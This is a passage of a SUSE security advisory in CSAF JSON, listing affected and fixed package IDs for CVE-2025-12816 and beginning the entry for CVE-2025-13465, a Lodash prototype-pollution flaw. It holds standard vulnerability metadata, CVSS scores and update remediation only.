"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-12816",
"url": "https://www.suse.com/security/cve/CVE-2025-12816"
},
{
"category": "external",
"summary": "SUSE Bug 1255584 for CVE-2025-12816",
"url": "https://bugzilla.suse.com/1255584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.6,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2025-12816"
},
{
"cve": "CVE-2025-13465",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-13465"
}
],
"notes": [
{
"category": "general",
"text": "Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.\n\nThe issue permits deletion of properties but does not allow overwriting their original behavior.\n\nThis issue is patched on 4.17.23",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
